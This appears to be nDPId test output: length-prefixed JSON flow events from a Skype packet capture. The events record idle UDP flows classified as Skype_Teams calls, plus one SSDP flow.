-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 